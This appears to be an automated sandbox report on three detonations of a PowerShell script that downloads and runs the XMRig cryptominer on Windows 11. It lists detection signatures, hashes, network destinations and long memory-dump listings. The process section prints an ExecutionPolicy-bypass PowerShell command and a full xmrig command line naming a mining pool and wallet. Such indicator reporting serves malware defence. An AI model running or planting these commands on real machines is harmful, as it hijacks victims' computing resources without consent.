memory/1360-151-0x00007FF6CD730000-0x00007FF6CE363000-memory.dmp

memory/1360-152-0x00007FF6CD730000-0x00007FF6CE363000-memory.dmp

memory/1360-153-0x00007FF6CD730000-0x00007FF6CE363000-memory.dmp

memory/1360-154-0x00007FF6CD730000-0x00007FF6CE363000-memory.dmp

memory/1360-155-0x00007FF6CD730000-0x00007FF6CE363000-memory.dmp

memory/1360-156-0x00007FF6CD730000-0x00007FF6CE363000-memory.dmp

Analysis: behavioral24

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:37

Platform

win11-20240426-en

Max time kernel

1799s

Max time network

1758s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp

Files

memory/3148-0-0x00007FFE8C563000-0x00007FFE8C565000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dngobbiv.uas.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3148-9-0x000001FF26E30000-0x000001FF26E52000-memory.dmp

memory/3148-10-0x00007FFE8C560000-0x00007FFE8D022000-memory.dmp

memory/3148-11-0x00007FFE8C560000-0x00007FFE8D022000-memory.dmp

memory/3148-12-0x00007FFE8C560000-0x00007FFE8D022000-memory.dmp

memory/3148-14-0x000001FF26FC0000-0x000001FF26FD2000-memory.dmp

memory/3148-15-0x000001FF26FB0000-0x000001FF26FBA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2184-46-0x0000026A16A90000-0x0000026A16AB0000-memory.dmp

memory/2184-47-0x0000026A18380000-0x0000026A183A0000-memory.dmp

memory/2184-48-0x00007FF6FE7F0000-0x00007FF6FF423000-memory.dmp

memory/3148-50-0x00007FFE8C560000-0x00007FFE8D022000-memory.dmp

memory/2184-51-0x0000026A183A0000-0x0000026A183C0000-memory.dmp

memory/2184-49-0x00007FF6FE7F0000-0x00007FF6FF423000-memory.dmp

memory/3148-52-0x00007FFE8C563000-0x00007FFE8C565000-memory.dmp

memory/2184-54-0x0000026A183C0000-0x0000026A183E0000-memory.dmp

memory/3148-53-0x00007FFE8C560000-0x00007FFE8D022000-memory.dmp

memory/2184-55-0x00007FF6FE7F0000-0x00007FF6FF423000-memory.dmp

memory/2184-57-0x0000026A183A0000-0x0000026A183C0000-memory.dmp

memory/2184-56-0x00007FF6FE7F0000-0x00007FF6FF423000-memory.dmp

memory/2184-58-0x0000026A183C0000-0x0000026A183E0000-memory.dmp

memory/2184-59-0x00007FF6FE7F0000-0x00007FF6FF423000-memory.dmp

memory/2184-60-0x00007FF6FE7F0000-0x00007FF6FF423000-memory.dmp

memory/2184-61-0x00007FF6FE7F0000-0x00007FF6FF423000-memory.dmp

memory/2184-62-0x00007FF6FE7F0000-0x00007FF6FF423000-memory.dmp

memory/2184-63-0x00007FF6FE7F0000-0x00007FF6FF423000-memory.dmp

memory/2184-64-0x00007FF6FE7F0000-0x00007FF6FF423000-memory.dmp

memory/2184-65-0x00007FF6FE7F0000-0x00007FF6FF423000-memory.dmp

memory/2184-66-0x00007FF6FE7F0000-0x00007FF6FF423000-memory.dmp

memory/2184-67-0x00007FF6FE7F0000-0x00007FF6FF423000-memory.dmp

memory/2184-68-0x00007FF6FE7F0000-0x00007FF6FF423000-memory.dmp

memory/2184-69-0x00007FF6FE7F0000-0x00007FF6FF423000-memory.dmp

memory/2184-70-0x00007FF6FE7F0000-0x00007FF6FF423000-memory.dmp

memory/2184-71-0x00007FF6FE7F0000-0x00007FF6FF423000-memory.dmp

memory/2184-72-0x00007FF6FE7F0000-0x00007FF6FF423000-memory.dmp

memory/2184-73-0x00007FF6FE7F0000-0x00007FF6FF423000-memory.dmp

memory/2184-74-0x00007FF6FE7F0000-0x00007FF6FF423000-memory.dmp

memory/2184-75-0x00007FF6FE7F0000-0x00007FF6FF423000-memory.dmp

memory/2184-76-0x00007FF6FE7F0000-0x00007FF6FF423000-memory.dmp

memory/2184-77-0x00007FF6FE7F0000-0x00007FF6FF423000-memory.dmp

memory/2184-78-0x00007FF6FE7F0000-0x00007FF6FF423000-memory.dmp

memory/2184-79-0x00007FF6FE7F0000-0x00007FF6FF423000-memory.dmp

memory/2184-80-0x00007FF6FE7F0000-0x00007FF6FF423000-memory.dmp

memory/2184-81-0x00007FF6FE7F0000-0x00007FF6FF423000-memory.dmp

memory/2184-82-0x00007FF6FE7F0000-0x00007FF6FF423000-memory.dmp

memory/2184-83-0x00007FF6FE7F0000-0x00007FF6FF423000-memory.dmp

memory/2184-84-0x00007FF6FE7F0000-0x00007FF6FF423000-memory.dmp

memory/2184-85-0x00007FF6FE7F0000-0x00007FF6FF423000-memory.dmp

memory/2184-86-0x00007FF6FE7F0000-0x00007FF6FF423000-memory.dmp

memory/2184-87-0x00007FF6FE7F0000-0x00007FF6FF423000-memory.dmp

memory/2184-88-0x00007FF6FE7F0000-0x00007FF6FF423000-memory.dmp

memory/2184-89-0x00007FF6FE7F0000-0x00007FF6FF423000-memory.dmp

memory/2184-90-0x00007FF6FE7F0000-0x00007FF6FF423000-memory.dmp

memory/2184-91-0x00007FF6FE7F0000-0x00007FF6FF423000-memory.dmp

memory/2184-92-0x00007FF6FE7F0000-0x00007FF6FF423000-memory.dmp

memory/2184-93-0x00007FF6FE7F0000-0x00007FF6FF423000-memory.dmp

memory/2184-94-0x00007FF6FE7F0000-0x00007FF6FF423000-memory.dmp

memory/2184-95-0x00007FF6FE7F0000-0x00007FF6FF423000-memory.dmp

memory/2184-96-0x00007FF6FE7F0000-0x00007FF6FF423000-memory.dmp

memory/2184-97-0x00007FF6FE7F0000-0x00007FF6FF423000-memory.dmp

memory/2184-98-0x00007FF6FE7F0000-0x00007FF6FF423000-memory.dmp

memory/2184-99-0x00007FF6FE7F0000-0x00007FF6FF423000-memory.dmp

memory/2184-100-0x00007FF6FE7F0000-0x00007FF6FF423000-memory.dmp

memory/2184-101-0x00007FF6FE7F0000-0x00007FF6FF423000-memory.dmp

memory/2184-102-0x00007FF6FE7F0000-0x00007FF6FF423000-memory.dmp

memory/2184-103-0x00007FF6FE7F0000-0x00007FF6FF423000-memory.dmp

memory/2184-104-0x00007FF6FE7F0000-0x00007FF6FF423000-memory.dmp

memory/2184-105-0x00007FF6FE7F0000-0x00007FF6FF423000-memory.dmp

memory/2184-106-0x00007FF6FE7F0000-0x00007FF6FF423000-memory.dmp

memory/2184-107-0x00007FF6FE7F0000-0x00007FF6FF423000-memory.dmp

memory/2184-108-0x00007FF6FE7F0000-0x00007FF6FF423000-memory.dmp

memory/2184-109-0x00007FF6FE7F0000-0x00007FF6FF423000-memory.dmp

memory/2184-110-0x00007FF6FE7F0000-0x00007FF6FF423000-memory.dmp

memory/2184-111-0x00007FF6FE7F0000-0x00007FF6FF423000-memory.dmp

memory/2184-112-0x00007FF6FE7F0000-0x00007FF6FF423000-memory.dmp

memory/2184-113-0x00007FF6FE7F0000-0x00007FF6FF423000-memory.dmp

memory/2184-114-0x00007FF6FE7F0000-0x00007FF6FF423000-memory.dmp

memory/2184-115-0x00007FF6FE7F0000-0x00007FF6FF423000-memory.dmp

memory/2184-116-0x00007FF6FE7F0000-0x00007FF6FF423000-memory.dmp

memory/2184-117-0x00007FF6FE7F0000-0x00007FF6FF423000-memory.dmp

Analysis: behavioral28

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:38

Platform

win11-20240508-en

Max time kernel

1799s

Max time network

1770s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp

Files

memory/232-0-0x00007FFD97EF3000-0x00007FFD97EF5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rwuj1o30.f0v.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/232-6-0x0000028FA12D0000-0x0000028FA12F2000-memory.dmp

memory/232-10-0x00007FFD97EF0000-0x00007FFD989B2000-memory.dmp

memory/232-11-0x00007FFD97EF0000-0x00007FFD989B2000-memory.dmp

memory/232-12-0x00007FFD97EF0000-0x00007FFD989B2000-memory.dmp

memory/232-14-0x0000028FA17F0000-0x0000028FA1802000-memory.dmp

memory/232-15-0x0000028FA1380000-0x0000028FA138A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3616-46-0x0000020FC3DF0000-0x0000020FC3E10000-memory.dmp

memory/3616-47-0x0000020FC56F0000-0x0000020FC5710000-memory.dmp

memory/3616-48-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/232-49-0x00007FFD97EF0000-0x00007FFD989B2000-memory.dmp

memory/232-51-0x00007FFD97EF3000-0x00007FFD97EF5000-memory.dmp

memory/3616-50-0x0000020FC5710000-0x0000020FC5730000-memory.dmp

memory/232-52-0x00007FFD97EF0000-0x00007FFD989B2000-memory.dmp

memory/3616-53-0x0000020FC5730000-0x0000020FC5750000-memory.dmp

memory/3616-54-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-55-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-57-0x0000020FC5710000-0x0000020FC5730000-memory.dmp

memory/3616-56-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-58-0x0000020FC5730000-0x0000020FC5750000-memory.dmp

memory/3616-59-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-60-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-61-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-62-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-63-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-64-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-65-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-66-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-67-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-68-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-69-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-70-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-71-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-72-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-73-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-74-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-75-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-76-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-77-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-78-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-79-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-80-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-81-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-82-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-83-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-84-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-85-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-86-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-87-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-88-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-89-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-90-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-91-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-92-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-93-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-94-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-95-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-96-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-97-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-98-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-99-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-100-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-101-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-102-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-103-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-104-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-105-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-106-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-107-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-108-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-109-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-110-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-111-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-112-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-113-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-114-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-115-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-116-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

memory/3616-117-0x00007FF7A6FF0000-0x00007FF7A7C23000-memory.dmp

Analysis: behavioral32

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:39

Platform

win11-20240426-en

Max time kernel

1798s

Max time network

1772s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
GB 161.35.34.195:443 rx.unmineable.com tcp
IE 52.111.236.22:443 tcp

Files

memory/2656-0-0x00007FFC80FE3000-0x00007FFC80FE5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pf0knquv.i02.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2656-9-0x000001EFCC370000-0x000001EFCC392000-memory.dmp

memory/2656-10-0x00007FFC80FE0000-0x00007FFC81AA2000-memory.dmp

memory/2656-11-0x00007FFC80FE0000-0x00007FFC81AA2000-memory.dmp

memory/2656-12-0x00007FFC80FE0000-0x00007FFC81AA2000-memory.dmp

memory/2656-14-0x000001EFCC410000-0x000001EFCC422000-memory.dmp

memory/2656-15-0x000001EFCC3E0000-0x000001EFCC3EA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
